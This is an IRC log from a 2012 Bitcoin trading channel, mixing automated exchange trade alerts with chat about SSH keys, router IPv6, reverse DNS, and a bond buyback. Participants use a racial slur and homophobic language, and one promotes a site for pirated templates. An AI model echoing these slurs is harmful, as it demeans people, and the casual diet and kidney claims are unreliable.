INDUSTRIAL! Aug 23 14:11:19 well if you wanted to stick it to me Aug 23 14:11:20 you did Aug 23 14:11:21 nine inch... n... blades. Aug 23 14:11:37 wait, that'd be bad Aug 23 14:11:40 i cant tell if our new site looks professional Aug 23 14:11:44 url Aug 23 14:11:47 or like a kiddie shit asshole fest Aug 23 14:11:53 btw, see that hosting.com site? Aug 23 14:11:56 http://wallet.bitvps.com Aug 23 14:11:57 yeah Aug 23 14:11:58 LENS FLARE NIGGA Aug 23 14:11:59 its waybetter Aug 23 14:12:01 than ours Aug 23 14:12:06 INDUSTRIAL LENS FLARE Aug 23 14:12:20 ........ Aug 23 14:12:20 i hate the footer Aug 23 14:12:23 i hate the huge footers Aug 23 14:12:25 rg, let me tell you something Aug 23 14:12:26 our site had that too Aug 23 14:12:27 i disabled it Aug 23 14:12:39 dont buy templates. Aug 23 14:12:43 it makes you look gay. Aug 23 14:12:45 i dont Aug 23 14:12:45 [MPEX] [S.MPOE] 41051 @ 0.00039108 = 16.0542 BTC [-] Aug 23 14:12:46 [MPEX] [S.MPOE] 10149 @ 0.0003902 = 3.9601 BTC [-] Aug 23 14:12:51 that looks like a fucking template. Aug 23 14:12:57 it is Aug 23 14:12:59 i didn't buy it though Aug 23 14:13:06 free -_-` Aug 23 14:13:08 thats even worse Aug 23 14:13:12 its not free Aug 23 14:13:15 it costs $600 Aug 23 14:13:19 SOMEBODY BOUGHT IT Aug 23 14:13:22 THATS ALL THAT MATTERS Aug 23 14:13:27 or did you steal it Aug 23 14:13:29 templatep2p.com Aug 23 14:13:31 ftw Aug 23 14:13:38 oh my fucking god Aug 23 14:13:46 a website template bitcoin tracker Aug 23 14:13:55 no.. Aug 23 14:14:00 i think you mean bittorrent Aug 23 14:14:03 but no, it doesnt use torrent Aug 23 14:14:05 its just a forum Aug 23 14:14:09 errr Aug 23 14:14:12 hahaha Aug 23 14:14:14 bitcoin tracker Aug 23 14:14:17 what have I done Aug 23 14:14:19 dude honestly Aug 23 14:14:22 ive done the SAME thing you just did Aug 23 14:14:25 at least 20 times Aug 23 14:14:35 you type bitcoin every day for 2 years Aug 23 14:14:41 it starts to stick Aug 23 14:14:45 [GLBSE] [BDT] 5 @ 1.024 = 5.12 BTC [-] Aug 23 14:14:47 [GLBSE] [BDT] 13 @ 1.025 = 13.325 BTC [+] Aug 23 14:14:48 [GLBSE] [BDT] 7 @ 1.028 = 7.196 BTC [+] Aug 23 14:14:49 [GLBSE] [BDT] 56 @ 1.03 = 57.68 BTC [+] Aug 23 14:14:50 [GLBSE] [BDT] 4 @ 1.0422 = 4.1688 BTC [+] Aug 23 14:14:53 ive ssh'd to cal1.vm.bitcoin.com Aug 23 14:14:54 before Aug 23 14:14:58 bit* Aug 23 14:15:10 you ssh to domain names? Aug 23 14:15:22 yeah, its actually a local host entry Aug 23 14:15:23 to the 10.x Aug 23 14:16:03 [GLBSE] [ASICMINER] 11 @ 0.0988 = 1.0868 BTC [+] Aug 23 14:16:08 i have sshd open right now Aug 23 14:16:11 i need to close it back up Aug 23 14:16:15 [GLBSE] [MMM] 3 @ 0.8 = 2.4 BTC [+] Aug 23 14:16:20 usually, by design, its meant to only listen on the 10.x Aug 23 14:16:38 but i broke the GRE / VPN tunnel combination Aug 23 14:16:45 and im too lazy to ix it Aug 23 14:16:57 btw Aug 23 14:17:00 one fault about enzu Aug 23 14:17:04 they put all the IPMI in the same subnet Aug 23 14:17:04 I dunno, caspar I have ssh setup so I just do ssh caspar Aug 23 14:17:06 and it works Aug 23 14:17:11 oh Aug 23 14:17:13 yeah i could do that too Aug 23 14:17:20 its just habit to type it all Aug 23 14:17:29 host caspar Aug 23 14:17:35 hostname caspar.adterrasperaspera.com Aug 23 14:17:41 in .ssh/config Aug 23 14:17:53 my .ssh/config is like 100 lines Aug 23 14:17:55 for different eys Aug 23 14:17:56 keys* Aug 23 14:17:59 yeah mine too Aug 23 14:18:04 [GLBSE] [SILVER] 1 @ 0.01 BTC [+] Aug 23 14:18:05 I have so many keys I need to do identityfile Aug 23 14:18:12 hm Aug 23 14:18:15 i should do that Aug 23 14:18:20 you have to Aug 23 14:18:22 i literally have SHIT LOADS of keys Aug 23 14:18:30 ssh disconnects you if you send too many keys Aug 23 14:18:36 [GLBSE] [ASICMINER] 88 @ 0.0988 = 8.6944 BTC [+] Aug 23 14:18:42 my keys are all Aug 23 14:18:43 key1.key Aug 23 14:18:45 key2.key Aug 23 14:18:46 key3.key Aug 23 14:18:56 ssh wont send them by default Aug 23 14:18:59 unless config tells them to Aug 23 14:19:02 yes it does Aug 23 14:19:04 thats the problem Aug 23 14:19:05 if i lost my config.. id be fucked Aug 23 14:19:11 no.. ssh uses id_dsa/rsa Aug 23 14:19:16 nope. Aug 23 14:19:17 it will send those Aug 23 14:19:20 bro Aug 23 14:19:21 ssh -v Aug 23 14:19:33 OpenSSH_6.0p1 Debian-2, OpenSSL 1.0.1c 10 May 2012 Aug 23 14:19:34 debug1: Offering public key: /jl/.ssh/id_rsa Aug 23 14:19:37 debug1: Offering public key: /jl/.ssh/id_dsa Aug 23 14:19:48 -v isnt verbose =P Aug 23 14:20:04 [james@elephant ~]$ ssh -v root@chi.vm.bitvps.com Aug 23 14:20:04 OpenSSH_5.5p1 Debian-6+squeeze1, OpenSSL 0.9.8o 01 Jun 2010 Aug 23 14:20:04 debug1: Reading configuration data /etc/ssh/ssh_config Aug 23 14:20:11 debug1: Applying options for * Aug 23 14:20:15 APPARNTLY IT IS Aug 23 14:20:20 heh Aug 23 14:20:47 ok i gotta setup this guys vm Aug 23 14:20:51 its already to 10 confirms Aug 23 14:20:59 I think they fixed the bug Aug 23 14:21:04 it only sends id_dsa/rsa now Aug 23 14:21:09 instead of all your keys Aug 23 14:21:19 rg: btw, we're technically using ssh wrong Aug 23 14:21:52 hrm Aug 23 14:21:53 enzu just went down Aug 23 14:22:04 we can have multiple public keys for a single private key under rsa Aug 23 14:22:05 --- cal2.vm.bitvps.com ping statistics --- Aug 23 14:22:05 6 packets transmitted, 1 received, 83% packet loss, time 5031ms Aug 23 14:22:05 rtt min/avg/max/mdev = 95.142/95.142/95.142/0.000 ms Aug 23 14:22:06 http://www.telegraph.co.uk/culture/art/9491391/Elderly-woman-destroys-19th-century-fresco-with-DIY-restoration.html Aug 23 14:22:09 THIS is the place you're going to hiost Aug 23 14:22:10 lol Aug 23 14:22:19 rg: its not down Aug 23 14:22:27 you know how I know? Aug 23 14:22:33 it just unlagged Aug 23 14:22:34 I bounce irc off of caspar. Aug 23 14:22:38 15 packets transmitted, 5 received, 66% packet loss, time 14078ms Aug 23 14:22:46 I am talking to you through an enzu server Aug 23 14:23:11 we're on different switches Aug 23 14:23:15 you're on brocade1 Aug 23 14:23:16 im on brocade2 Aug 23 14:23:22 lol brocade Aug 23 14:23:24 [GLBSE] [BITCOINMINV] 10 @ 0.126 = 1.26 BTC [+] Aug 23 14:23:25 [GLBSE] [STANDARD.GOLD] 1 @ 0.00000002 BTC [-] Aug 23 14:23:31 laugh all you want, that's what they se Aug 23 14:23:32 use Aug 23 14:23:43 I know Aug 23 14:23:51 but nenolod knows how to make brocade shit work Aug 23 14:23:57 no.. he dosent Aug 23 14:24:01 that's why they called in a tech Aug 23 14:24:03 to do the ipv6 Aug 23 14:24:03 something about taking a wrench to brocade engineers Aug 23 14:24:13 [GLBSE] [STANDARD.GOLD] 1 @ 0.00000002 BTC [-] Aug 23 14:24:15 do you know how long it took them to get ipv6? Aug 23 14:24:24 dude Aug 23 14:24:27 I dont even have ipv6 yet Aug 23 14:24:32 file a ticket Aug 23 14:24:34 you do Aug 23 14:24:36 because openwrt NEEDS TO GET THEIR ASSES IN GEAR Aug 23 14:24:38 ask for RA + a prefix Aug 23 14:24:41 I mean locally Aug 23 14:24:42 ohh Aug 23 14:24:44 yeah Aug 23 14:24:45 same here Aug 23 14:24:50 we 'technically' have it Aug 23 14:24:53 but our router cant fucking route it Aug 23 14:25:10 and its fucking linux Aug 23 14:25:12 it can route it Aug 23 14:25:17 I can install all the fucking shit Aug 23 14:25:20 not without ipv6.ko Aug 23 14:25:21 hehe Aug 23 14:25:29 but the web ui and shit doesnt work Aug 23 14:25:33 even the firewall doesnt Aug 23 14:25:51 install ipv6 on openwrt without manually firewalling shit out == public webui access Aug 23 14:25:54 thx assholes Aug 23 14:26:02 root@DD-WRT:~# modprobe ipv6 Aug 23 14:26:02 -sh: modprobe: not found Aug 23 14:26:09 install the package for it Aug 23 14:26:18 i dont know if ipkg works on here Aug 23 14:26:19 openwrt has packages for specific bloaty kernel modules Aug 23 14:26:33 yeah i only setup ipkg on our NAS Aug 23 14:26:35 not the router Aug 23 14:26:45 jesus, reading back rg is the new danieldaniel Aug 23 14:26:48 how? openwrt does that automatically Aug 23 14:27:06 root@DD-WRT:~# ipkg Aug 23 14:27:07 please enable jffs first, you can't use IPKG without jffs support Aug 23 14:27:16 wtf what did you do Aug 23 14:27:19 mircea_popescu: i get excited Aug 23 14:27:30 especialy now cause i woke up a few hrs ago Aug 23 14:27:37 the promise of a new day is like meth to me Aug 23 14:28:33 i just dont know where else to put it << my jewish masterplan. it works Aug 23 14:28:44 i could setup a VM Aug 23 14:28:56 but i already use enough IPs for my own nefarious deeds Aug 23 14:29:26 i wonder how long till someone sells industrial strippers. Aug 23 14:29:57 ssh 199.48.69.252 Aug 23 14:30:04 er Aug 23 14:30:08 no wonder that didn't work Aug 23 14:30:13 this isnt a terminal. Aug 23 14:32:58 [GLBSE] [FUTUREFUND] 200 @ 0.0001185 = 0.0237 BTC [+] Aug 23 14:35:59 smickles Aug 23 14:36:02 do you want reverse DNS? Aug 23 14:41:31 Diablo-D3: for remote backup Aug 23 14:41:36 you should use the same company as us Aug 23 14:41:40 they're a friend of enzu Aug 23 14:41:47 well, the owner is friends with bdwarr and neno Aug 23 14:41:53 and he's a solid individul Aug 23 14:42:13 rg : you really should get all tehse doods in the wot. Aug 23 14:42:16 it's good for them. Aug 23 14:42:53 none of them bother wih BTC anmore Aug 23 14:42:58 nenolod used to, hes not interested anymore Aug 23 14:43:37 [GLBSE] [TYGRR.BOND-P] 1 @ 0.665 BTC [+] Aug 23 14:44:54 43.00000000 WIN 86.16496400 5861 Aug 23 14:44:56 WIN Aug 23 14:46:02 [GLBSE] [BDT] 3 @ 1.011 = 3.033 BTC [-] Aug 23 14:46:18 [GLBSE] [BDT] 1 @ 1.01 BTC [-] Aug 23 14:47:33 [GLBSE] [BDK.BND] 166 @ 0.101 = 16.766 BTC [-] Aug 23 14:50:34 [MPEX] [S.MPOE] 34351 @ 0.0003902 = 13.4038 BTC [-] Aug 23 14:50:34 [MPEX] [S.MPOE] 24549 @ 0.00038996 = 9.5731 BTC [-] Aug 23 14:51:01 did you just get 86 btc ? Aug 23 14:51:37 [GLBSE] [OBSI.1MHS] 4 @ 0.099 = 0.396 BTC [+] Aug 23 14:54:04 [GLBSE] [PPT.B] 4 @ 1.01 = 4.04 BTC [-] Aug 23 14:54:06 [GLBSE] [PUREMINING] 5 @ 0.13691 = 0.6846 BTC [-] Aug 23 14:54:20 [MPEX] [S.MPOE] 31031 @ 0.00039028 = 12.1108 BTC [+] Aug 23 14:55:18 [GLBSE] [FOO.PPPPT] 29 @ 0.768 = 22.272 BTC [-] Aug 23 14:55:32 rg: my shit already is enzu Aug 23 14:56:30 but anyway, rg, wot is not only for bitcoin. Aug 23 14:56:33 wot is the solution. Aug 23 14:59:39 [GLBSE] [TEEK.B] 2 @ 1 = 2 BTC [-] Aug 23 14:59:53 diablo Aug 23 14:59:54 what do you mean Aug 23 15:00:01 you're using an enzu data storage service? Aug 23 15:00:10 god help you Aug 23 15:00:52 no Aug 23 15:00:58 the vps is enzu Aug 23 15:01:06 [MPEX] [S.MPOE] 7100 @ 0.00039028 = 2.771 BTC [+] Aug 23 15:01:07 and before that it was rapidxen Aug 23 15:01:25 whaat are you talking about Aug 23 15:01:25 [MPEX] [S.MPOE] 22300 @ 0.00038996 = 8.6961 BTC [-] Aug 23 15:01:26 [GLBSE] [BITBOND] 5 @ 0.4599 = 2.2995 BTC [+] Aug 23 15:01:27 im saying for backup Aug 23 15:01:31 $999 w/ 24 x 2TB 7.2k Enterprise, Usable Space: Raid5 42.8TB, Raid10 24TB Aug 23 15:01:43 that's what i want for bitvps Aug 23 15:01:47 just $500 cheaper Aug 23 15:02:10 rg: backup? wtf? Aug 23 15:02:18 why would I need them for backup? Aug 23 15:02:23 Diablo-D3: your customers are going to want backup services Aug 23 15:02:28 hard drives die Aug 23 15:02:39 thats their problem Aug 23 15:02:49 always backup your data no matter what Aug 23 15:04:00 [GLBSE] [PIMP] 1 @ 0.175 BTC [+] Aug 23 15:04:04 [GLBSE] [MERGEDMINING] 1 @ 0.09399 BTC [+] Aug 23 15:05:01 rg: someone online put it best Aug 23 15:05:03 3 2 1 Aug 23 15:05:10 3 backups: 2 remote, 1 local. Aug 23 15:05:44 [GLBSE] [TYGRR.BOND-A] 1 @ 0.1 BTC [+] Aug 23 15:05:54 [GLBSE] [BTCMC] 1 @ 0.5701 BTC [+] Aug 23 15:07:32 [GLBSE] [BTCMC] 4 @ 0.5521 = 2.2084 BTC [-] Aug 23 15:10:43 [GLBSE] [BTCMC] 2 @ 0.5502 = 1.1004 BTC [-] Aug 23 15:11:51 [GLBSE] [ARS] 50 @ 0.0135 = 0.675 BTC [+] Aug 23 15:12:22 [GLBSE] [ARS] 80 @ 0.015 = 1.2 BTC [+] Aug 23 15:12:34 [GLBSE] [TEEK.B] 10 @ 0.82 = 8.2 BTC [-] Aug 23 15:24:46 [GLBSE] [GIGAMINING] 1 @ 0.987 BTC [-] Aug 23 15:25:54 [GLBSE] [OBSI.HRPT] 14 @ 0.10495 = 1.4693 BTC [+] Aug 23 15:28:17 [GLBSE] [TYGRR.BOND-P] 21 @ 0.79 = 16.59 BTC [+] Aug 23 15:28:27 [GLBSE] [YABMC] 1 @ 0.129099 BTC [-] Aug 23 15:30:00 [GLBSE] [TYGRR.BOND-P] 3 @ 0.8 = 2.4 BTC [+] Aug 23 15:31:26 [GLBSE] [PUREMINING] 1 @ 0.13691 BTC [-] Aug 23 15:31:52 [MPEX] [F.GIGA.ETF] 8008 @ 0.00103955 = 8.3247 BTC [+] Aug 23 15:31:54 [MPEX] [F.GIGA.ETF] 3769 @ 0.00104056 = 3.9219 BTC [+] Aug 23 15:31:55 [MPEX] [F.GIGA.ETF] 3123 @ 0.00104192 = 3.2539 BTC [+] Aug 23 15:36:26 [GLBSE] [OBSI.HRPT] 8 @ 0.10495 = 0.8396 BTC [+] Aug 23 15:44:18 [GLBSE] [TYGRR.BOND-P] 30 @ 0.7 = 21 BTC [-] Aug 23 15:44:44 [GLBSE] [TYGRR.BOND-P] 2 @ 0.6101 = 1.2202 BTC [-] Aug 23 15:44:45 [GLBSE] [TYGRR.BOND-P] 2 @ 0.61 = 1.22 BTC [-] Aug 23 15:44:46 [GLBSE] [TYGRR.BOND-P] 2 @ 0.6 = 1.2 BTC [-] Aug 23 15:44:48 [GLBSE] [TYGRR.BOND-P] 2 @ 0.58 = 1.16 BTC [-] Aug 23 15:44:49 [GLBSE] [TYGRR.BOND-P] 2 @ 0.55 = 1.1 BTC [-] Aug 23 15:44:50 [GLBSE] [TYGRR.BOND-P] 20 @ 0.52 = 10.4 BTC [-] Aug 23 15:45:22 [GLBSE] [BIB.PIRATE] 2 @ 0.6503 = 1.3006 BTC [-] Aug 23 15:45:23 [GLBSE] [BIB.PIRATE] 48 @ 0.6502 = 31.2096 BTC [-] Aug 23 15:45:59 [GLBSE] [TYGRR.BOND-P] 10 @ 0.52 = 5.2 BTC [-] Aug 23 15:46:24 [GLBSE] [TYGRR.BOND-P] 2 @ 0.52 = 1.04 BTC [-] Aug 23 15:46:26 [GLBSE] [TYGRR.BOND-P] 18 @ 0.51 = 9.18 BTC [-] Aug 23 15:46:50 [GLBSE] [TYGRR.BOND-P] 2 @ 0.5201 = 1.0402 BTC [+] Aug 23 15:46:52 [GLBSE] [TYGRR.BOND-P] 2 @ 0.51 = 1.02 BTC [-] Aug 23 15:46:52 [GLBSE] [TYGRR.BOND-P] 32 @ 0.5 = 16 BTC [-] Aug 23 15:47:45 [GLBSE] [TYGRR.BOND-P] 4 @ 0.5 = 2 BTC [-] Aug 23 15:47:46 [GLBSE] [TYGRR.BOND-P] 2 @ 0.5 = 1 BTC [-] Aug 23 15:47:47 [GLBSE] [TYGRR.BOND-P] 2 @ 0.48 = 0.96 BTC [-] Aug 23 15:47:48 [GLBSE] [TYGRR.BOND-P] 1 @ 0.48 BTC [-] Aug 23 15:47:49 [GLBSE] [TYGRR.BOND-P] 1 @ 0.46001 BTC [-] Aug 23 15:47:50 [GLBSE] [TYGRR.BOND-P] 5 @ 0.46000001 = 2.3 BTC [-] Aug 23 15:47:52 [GLBSE] [TYGRR.BOND-P] 33 @ 0.46 = 15.18 BTC [-] Aug 23 15:48:23 [GLBSE] [BIB.PIRATE] 2 @ 0.6502 = 1.3004 BTC [-] Aug 23 15:48:25 [GLBSE] [BIB.PIRATE] 16 @ 0.65 = 10.4 BTC [-] Aug 23 15:49:40 [GLBSE] [BIB.PIRATE] 2 @ 0.65 = 1.3 BTC [-] Aug 23 15:49:41 [GLBSE] [BIB.PIRATE] 26 @ 0.52 = 13.52 BTC [-] Aug 23 15:50:17 why the selloff? Aug 23 15:51:10 lost hope Aug 23 15:51:41 any new news? (just woke up) Aug 23 15:52:33 dont think so...one apparent payout but its probably bullshit Aug 23 15:52:43 ah Aug 23 15:55:53 [GLBSE] [HYDRO.BONDS] 1 @ 1.6 BTC [-] Aug 23 15:55:55 [GLBSE] [HYDRO.BONDS] 2 @ 1.5298 = 3.0596 BTC [-] Aug 23 15:57:22 [GLBSE] [OBSI.HRPT] 44 @ 0.10495 = 4.6178 BTC [+] Aug 23 15:58:38 [GLBSE] [TYGRR.BOND-PI] 30 @ 1 = 30 BTC [+] Aug 23 16:03:38 hey Aug 23 16:03:43 how often do usb storage devices fail Aug 23 16:03:45 often? Aug 23 16:06:50 [GLBSE] [OBSI.HRPT] 1 @ 0.10495 BTC [+] Aug 23 16:20:14 [GLBSE] [COGNITIVE] 4 @ 0.6402 = 2.5608 BTC [-] Aug 23 16:21:30 [GLBSE] [PUREMINING] 8 @ 0.1001 = 0.8008 BTC [-] Aug 23 16:22:29 [GLBSE] [BTC-MINING] 3 @ 0.8 = 2.4 BTC [-] Aug 23 16:28:25 [GLBSE] [ASICMINER] 2 @ 0.0987 = 0.1974 BTC [-] Aug 23 16:28:27 [GLBSE] [ASICMINER] 7 @ 0.0988 = 0.6916 BTC [+] Aug 23 16:34:28 im really getting into flossing Aug 23 16:34:29 its dope Aug 23 16:34:37 you guys should try it Aug 23 16:36:11 you mean in your mouth ? Aug 23 16:36:14 [GLBSE] [GIGAMINING] 12 @ 0.9869 = 11.8428 BTC [-] Aug 23 16:36:15 [GLBSE] [GIGAMINING] 9 @ 0.987 = 8.883 BTC [+] Aug 23 16:36:17 [GLBSE] [GIGAMINING] 29 @ 0.9875 = 28.6375 BTC [+] Aug 23 16:38:00 [GLBSE] [OBSI.HRPT] 5 @ 0.10495 = 0.5248 BTC [+] Aug 23 16:40:00 [GLBSE] [PPT.B] 4 @ 1.01 = 4.04 BTC [-] Aug 23 16:41:00 [GLBSE] [ASICMINER] 1 @ 0.0988 BTC [+] Aug 23 16:42:01 yep Aug 23 16:42:06 i used to just brush Aug 23 16:42:11 and lie to the dentist whenhe asked if i flossed Aug 23 16:42:23 the most fruitless lie of lies Aug 23 16:42:25 hahahah Aug 23 16:42:25 since he can obviously tell Aug 23 16:43:25 I'm with ya there. I bet people lie to the dentists all the time. Aug 23 16:43:53 my gums used to bleed a ton Aug 23 16:43:57 today they only bled a tiny tiny tiny bit Aug 23 16:43:58 Lying on your back with a persons hands in your mouth.... It's akward. Aug 23 16:44:01 and it was the front teeth Aug 23 16:44:42 Ya, it makes your gums strong so you don't get the old man teeth. You know, where the gums withdraw and you see too much tooth. Aug 23 16:44:49 yeah Aug 23 16:44:50 that's weird lookin Aug 23 16:49:50 [GLBSE] [OBSI.HRPT] 10 @ 0.1038 = 1.038 BTC [-] Aug 23 16:57:19 [GLBSE] [ASICMINER] 1 @ 0.0988 BTC [+] Aug 23 16:58:46 [GLBSE] [ARS] 58 @ 0.019 = 1.102 BTC [+] Aug 23 17:00:50 [GLBSE] [ASICMINER] 11 @ 0.0988 = 1.0868 BTC [+] Aug 23 17:01:36 [GLBSE] [OBSI.HRPT] 20 @ 0.1038 = 2.076 BTC [-] Aug 23 17:02:08 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 23 17:02:17 [GLBSE] [ASICMINER] 1 @ 0.0988 BTC [+] Aug 23 17:02:24 [GLBSE] [ASICMINER] 1 @ 0.0988 BTC [+] Aug 23 17:02:37 [GLBSE] [ASICMINER] 1 @ 0.0988 BTC [+] Aug 23 17:03:12 [GLBSE] [ASICMINER] 1 @ 0.0988 BTC [+] Aug 23 17:04:44 [GLBSE] [ASICMINER] 3 @ 0.0988 = 0.2964 BTC [+] Aug 23 17:04:54 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 23 17:05:03 [GLBSE] [ASICMINER] 4 @ 0.0988 = 0.3952 BTC [+] Aug 23 17:05:12 [GLBSE] [ASICMINER] 1 @ 0.0988 BTC [+] Aug 23 17:05:20 [GLBSE] [ASICMINER] 1 @ 0.0988 BTC [+] Aug 23 17:06:37 [GLBSE] [ASICMINER] 2 @ 0.0988 = 0.1976 BTC [+] Aug 23 17:07:06 [GLBSE] [DMC] 1 @ 0.05 BTC [+] Aug 23 17:07:43 [MPEX] [O.BTCUSD.C100T] 800 @ 0.08457657 = 67.6613 BTC [+] Aug 23 17:09:31 [GLBSE] [PPT.B] 1 @ 1.01 BTC [-] Aug 23 17:17:24 [GLBSE] [ASICMINER] 1 @ 0.0988 BTC [+] Aug 23 17:18:01 [GLBSE] [ASICMINER] 1 @ 0.0988 BTC [+] Aug 23 17:21:42 rg Aug 23 17:21:53 smickles Aug 23 17:22:15 reverse dns would be nice, i haven't looked inot how to set it up yet Aug 23 17:22:31 you just add an A recovery to the hostname Aug 23 17:22:33 on your DNS servers Aug 23 17:22:36 then i set the reverse dns Aug 23 17:23:41 [GLBSE] [BBBB] 5 @ 0.00027999 = 0.0014 BTC [+] Aug 23 17:25:38 "A recovery"? Aug 23 17:25:49 i'm a bit noobish here Aug 23 17:25:50 er Aug 23 17:25:53 A record Aug 23 17:25:54 sorry Aug 23 17:26:20 ah, so an A, but with mostofmany.com, instead of the ip? Aug 23 17:28:01 no Aug 23 17:28:02 oh, that can't be right Aug 23 17:28:12 you create an A record for mostofmany.com Aug 23 17:28:15 smickles: create an A record pointing to the VPS's IP address on the domain you wish to be set for RDNS Aug 23 17:28:15 pointing to your VPS ip Aug 23 17:28:17 that's forward DNS Aug 23 17:28:24 eg mostofmany.com A 1.2.3.4 Aug 23 17:28:28 then on the other side, i set the IP to the hostname Aug 23 17:28:32 i'm pretty sure i already have that Aug 23 17:28:36 so it looks up the hostname, gets the IP, looks up the IP, gets the hostname Aug 23 17:28:44 ok Aug 23 17:28:45 you do Aug 23 17:28:47 then its just my job Aug 23 17:28:52 mostofmany.com. 900 IN A 199.48.69.252 Aug 23 17:28:53 :D Aug 23 17:30:19 rg, you're so good to me Aug 23 17:30:21 :D Aug 23 17:30:24 need more pompkins Aug 23 17:30:34 i didn't know! Aug 23 17:32:15 [GLBSE] [TYGRR.BOND-A] 65 @ 0.1 = 6.5 BTC [+] Aug 23 17:32:56 [GLBSE] [RSM] 22 @ 0.2999 = 6.5978 BTC [+] Aug 23 17:34:47 rg being lazy. Aug 23 17:35:20 cooking bacon in butter and eggs in butter and eating them, you practically arnt hungry for the rest of the day Aug 23 17:35:32 like hell, Aug 23 17:35:40 you must then have chocolate icecream Aug 23 17:36:49 from what i undrstand, i'm about "this close" to a ketogenic diet Aug 23 17:36:55 all on my own Aug 23 17:37:10 [GLBSE] [OBSI.HRPT] 30 @ 0.10494 = 3.1482 BTC [+] Aug 23 17:37:11 [GLBSE] [OBSI.HRPT] 70 @ 0.10495 = 7.3465 BTC [+] Aug 23 17:37:53 kinda bad for your kidneys tho Aug 23 17:38:20 i drink quite a bit of water, does that help? Aug 23 17:39:43 likely yea Aug 23 17:40:00 ketonuria is this relatively common kidney problem Aug 23 17:40:34 for people with diabetes Aug 23 17:40:41 primary avenue for kidney damage in diabetes. Aug 23 17:43:36 huh, arn't those keto people going for ketonuria, basically as a goal? Aug 23 17:43:56 https://bitcointalk.org/index.php?topic=96793.msg1126612#msg1126612 Aug 23 17:44:27 mmm Aug 23 17:44:28 i dunno ? Aug 23 17:44:40 its not a healthy state tho. Aug 23 17:45:15 DeaDTerra: have you spoken with nefario about that? Aug 23 17:45:33 DeaDTerra so did you get 1905 btc from pirate ? Aug 23 17:45:33 he seem to tell me that a dividend payment was not the way to go about such a thing Aug 23 17:45:34 about what? Aug 23 17:45:47 (you link) Aug 23 17:46:04 Okay, well I don't specify how to reinburse the share holders Aug 23 17:46:08 what does he want? a bidwall to buyout the shares? Aug 23 17:46:12 I was going to ask him but he didn't answer. Aug 23 17:46:22 BTCHero: yeah, that's what he told me Aug 23 17:46:38 We do not yet have the full amount and people have been whineing a lot, to buy back only some of the bonds would be unfair. Aug 23 17:46:57 i understand Aug 23 17:47:00 Why is dividends a bad way of doing it? Aug 23 17:47:03 but i'm not sure about nefario Aug 23 17:47:06 pay out the first dividend, then put up a bidwall for the rest Aug 23 17:47:09 everyone is happy Aug 23 17:47:12 i don't see why it'd be a bad way of doing it. Aug 23 17:47:18 that's what I was planning on doing :) Aug 23 17:47:28 either that or a second and final dividend Aug 23 17:47:31 the sooner bondholders can extract their capital the better. Aug 23 17:47:40 but I guess NEfario don't want scrap assets so it's best to buy them back Aug 23 17:48:04 DeaDTerra: hey Aug 23 17:48:13 DeaDTerra: how many shares of asicminer do you need to be on the board? Aug 23 17:48:24 the arbitrage bot me and Willem run made 1.75% yesterday in pure profits ;) Aug 23 17:48:30 5000 Aug 23 17:48:34 i paid back via dividend on that composite etf, and the asset didn't get pulled in time, people started trading after it was dead Aug 23 17:48:36 damn, need more shares Aug 23 17:48:43 only have 1980 Aug 23 17:49:20 https://glbse.com/asset/view/GSDPT Aug 23 17:49:24 this looks pretty healthy. Aug 23 17:49:40 like 300k or so there so far ? Aug 23 17:50:14 360 even Aug 23 17:50:32 hahah I low balled on half of that :P Aug 23 17:50:37 I guess I will have to order more Aug 23 17:50:57 DeaDTerra : you really should make you have enough shares on hand Aug 23 17:51:01 insufficient shares --> mayhem. Aug 23 17:51:16 I can issue shares as I wish on GLBSE right? Aug 23 17:51:19 i dunno Aug 23 17:51:25 I just click the issue more shares, I am pretty sure. Aug 23 17:51:25 and there's a narrow window of time there Aug 23 17:51:32 DeaDTerra: yeahg Aug 23 17:51:43 i was doing it programatically event Aug 23 17:51:58 What I will do is just buy up all the bid walls, then transfer that amount to MPex and buy the sahres :) Aug 23 17:52:03 my keyboard hates me Aug 23 17:52:19 DeaDTerra ill be around to expedite movements. Aug 23 17:52:31 thanks I might need some help ;) Aug 23 17:52:42 and a confirm from you that I am backing with 1:1 is always good :) Aug 23 17:52:48 DeaDTerra: so your fund will launch before the dice ipo? Aug 23 17:52:52 might not hurt anything if you do a test run first Aug 23 17:52:58 make sure you got everything going. Aug 23 17:53:04 put a 1 share bid in or w/e Aug 23 17:53:10 just to have verified you got it all covered. Aug 23 17:53:26 Yes, the pass through will start before the IPO Aug 23 17:53:48 Okay sure, will you be around in a couple of hours to help me? Aug 23 17:53:48 1400 eastern, right? Aug 23 17:53:58 14:00 GLBSE time Aug 23 17:54:07 which is like 20:00 GMT+1 xD (my time) Aug 23 17:54:16 actually DeaDTerra i will be off in about an hour, back later today/tomorrow. Aug 23 17:55:06 Oki should we do it now then? Aug 23 17:55:09 but if you got pympex you shouldwhine at Azelphur, it's his fault he wrote such difficult to use software :D Aug 23 17:55:12 now works, sure. Aug 23 17:55:27 difficult to use? o.O Aug 23 17:55:32 ya man Aug 23 17:55:34 I don't have python Aug 23 17:55:41 DeaDTerra you're on windows ? Aug 23 17:55:43 also look who's talking mr terrible website Aug 23 17:55:48 :p Aug 23 17:55:49 yep windows Aug 23 17:55:52 Azelphur my website is great Aug 23 17:55:54 i can translate the gpg command Aug 23 17:56:00 DeaDTerra there's a precompuiled windows with libraries thing Aug 23 17:56:03 look in the faq is a link Aug 23 17:56:11 really Aug 23 17:56:18 yes ? Aug 23 17:56:34 i should make one for an atari, just to cover all bases now Aug 23 17:56:39 ahaha atari Aug 23 17:56:47 there's mac and windows, aegis made them Aug 23 17:57:00 there's perl from mod6 and python from Azelphur Aug 23 17:57:09 and im waiting on rms to include it in the C compiler. Aug 23 17:57:16 ha Aug 23 17:57:19 oki downloading though I don't have python xD Aug 23 17:57:19 lol Aug 23 17:57:26 lol Aug 23 17:57:33 DeaDTerra the windows compiled thing should work standalone Aug 23 17:58:04 hey, i contributed to Azelphur (just a little bit) so it's not entirely his, it's like 99% his Aug 23 17:58:13 haha Aug 23 17:58:15 i bet you did the parts that are good Aug 23 17:58:37 i made an installer script for it :/ Aug 23 17:58:40 it says something about it's for windows 98 or somthing Aug 23 17:58:55 um really ? Aug 23 17:59:08 (i never used it) Aug 23 17:59:08 which should I open it with? Aug 23 17:59:16 ughm Aug 23 17:59:31 [MPEX] [F.GIGA.ETF] 13170 @ 0.00104192 = 13.7221 BTC [+] Aug 23 17:59:32 [MPEX] [F.GIGA.ETF] 2040 @ 0.00104221 = 2.1261 BTC [+] Aug 23 17:59:36 is aegis on in any bitcoin chan atm 